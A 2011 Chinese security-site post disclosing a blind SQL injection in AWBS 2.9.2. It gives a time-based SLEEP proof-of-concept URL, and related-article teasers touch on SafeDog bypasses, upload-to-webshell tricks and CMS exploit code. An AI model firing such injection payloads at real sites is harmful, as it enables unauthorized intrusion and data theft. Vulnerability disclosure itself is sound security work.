AWBS 2.9.2 Blind SQL 注入0day
發(fā)布時間:2011-03-11 11:59:20 作者:佚名
我要評論

AWBS 2.9.2 Blind SQL 注入0day,大家可以參考下。
影響版本:AWBS 2.9.2
官方網(wǎng)站:http://www.awbs.com
漏洞類型:SQL注入
漏洞描述:
---Vulnerability---
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
相關(guān)文章
- 偶爾在網(wǎng)上看到這些,拿來和大家一塊看看,也好讓各個站長懂得保護自己的網(wǎng)站2012-10-16
- 安全狗是一款大家熟悉的服務(wù)器安全加固產(chǎn)品,據(jù)稱已經(jīng)擁有50W的用戶量。最近經(jīng)過一些研究,發(fā)現(xiàn)安全狗的一些防護功能,例如SQL注入、文件上傳、防webshell等都可以被繞過2014-07-17
- 今天日站發(fā)現(xiàn)的.... http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上傳洞洞 上傳后沒改文件名!可以IIS解析 后面的事,你懂的~ 有點像FC2011-03-11
SiteServer CMS 系統(tǒng)0Day/漏洞利用
詳解:跟以前動易一樣注冊會員時可以用xx.asp的樣式注冊。而我們上次的附件圖片也都是按照我們的會員名來存放的。那么悲劇的0day就產(chǎn)生了。利用IIS解析特性! 利用2011-03-11- 有點雞肋,配合前幾天公布的iis6文件名解析漏洞達到獲取webshell的目的。2010-09-30
WordPress WassUp插件 spy.php腳本含SQL注入漏洞
受影響系統(tǒng): WordPress WassUp 1.4 - 1.4.3 不受影響系統(tǒng): WordPress WassUp 1.4.3a 描述: WordPress是一款免費的論壇Blog系統(tǒng)。 WordPress的WassUp插件2008-10-08- 電腦用久了,裝的軟件,插件,越來越多,所做的操作也會留下很多垃圾文件保持在電腦上,加上電腦硬件也會老化,電腦中毒什么的。都有可能導(dǎo)致電腦開機速度慢。2012-05-04
- 有時在通過注射得到織夢程序的管理密碼時,卻發(fā)現(xiàn)找不到后臺地址。。 這個時候 大家可以嘗試下在地址后面加上:/include/dialog/select_media.php?f=form1.murl2011-03-11
- 以下是search.inc.php 文件漏洞利用代碼VBS版 [code] Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then Sho2009-04-18
查找Centos Linux服務(wù)器上入侵者的WebShell后門
服務(wù)器被掛馬或被黑的朋友應(yīng)該知道,黑客入侵web服務(wù)器的第一目標(biāo)是往服務(wù)器上上傳一個webshell,有了webshell黑客就可以干更多的事 情2012-07-10